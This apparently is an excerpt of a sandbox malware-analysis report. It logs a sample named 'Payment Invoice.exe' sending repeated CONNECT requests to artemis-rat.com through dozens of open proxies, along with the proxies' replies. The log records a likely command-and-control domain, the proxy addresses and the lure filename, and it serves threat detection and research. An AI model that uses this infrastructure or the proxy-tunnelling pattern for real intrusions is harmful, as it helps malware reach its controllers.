                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1743192.168.2.455146138.36.150.2610807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.125348091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1744192.168.2.45112179.143.177.29219727076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.129569054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.555071115 CET131INHTTP/1.1 503 Too many open connections
                                                                Content-Type: text/plain
                                                                Connection: close
                                                                Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                Data Ascii: Maximum number of open connections reached.


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1745192.168.2.45364984.201.138.23710807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.132389069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1746192.168.2.451106109.201.233.21980807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.141400099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183232069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.737670898 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1747192.168.2.455151125.122.26.24210807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.141866922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1748192.168.2.454712117.160.250.130807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.152024984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.511524916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.246865988 CET303INHTTP/1.1 400 Bad Request
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:25 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 154
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1749192.168.2.455154103.216.49.23380807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.156158924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1750192.168.2.453446105.112.140.21880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.157171965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183269024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1751192.168.2.454852117.160.250.163817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.157358885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.693062067 CET221INHTTP/1.1 403 Access Denied
                                                                Date: Mon, 11 Mar 2024 15:15:23 GMT
                                                                Connection: close
                                                                Cache-Control: no-store
                                                                Content-Type: text/html
                                                                Content-Language: en
                                                                Content-Length: 43
                                                                Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                Data Ascii: You are not allowed to access the document.


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1752192.168.2.4551558.218.100.12080807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.159646988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.886118889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.777138948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.589535952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.238452911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1753192.168.2.453657185.129.250.183322847076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.159742117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183249950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.264681101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.386662960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.386162996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1754192.168.2.454265206.220.175.241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.159743071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1755192.168.2.45365945.81.232.17594217076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.160459042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183303118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.264740944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.386646986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.386168003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1756192.168.2.45515894.131.14.6610817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.164983034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1757192.168.2.45515694.177.106.17823247076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.165291071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1758192.168.2.455147122.114.232.1378087076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.165513992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1759192.168.2.455160103.166.141.74200747076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.167567015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1760192.168.2.45366262.109.0.18241017076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.168417931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183270931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.264744997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.386689901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.387974977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:59.479911089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:11.589337111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:35.589227915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:23.714287043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1761192.168.2.454997188.164.193.178112517076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.210952997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1762192.168.2.455157203.112.134.7456787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.215331078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1763192.168.2.455159175.183.82.22181977076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.246309996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1764192.168.2.45494345.65.65.1841457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.246732950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1765192.168.2.45120079.110.119.18180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.255076885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.329293966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.386379957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.386732101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.387968063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:59.479902983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:11.589620113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:35.589468956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:23.714764118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1766192.168.2.45369251.75.126.150154747076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.259809017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
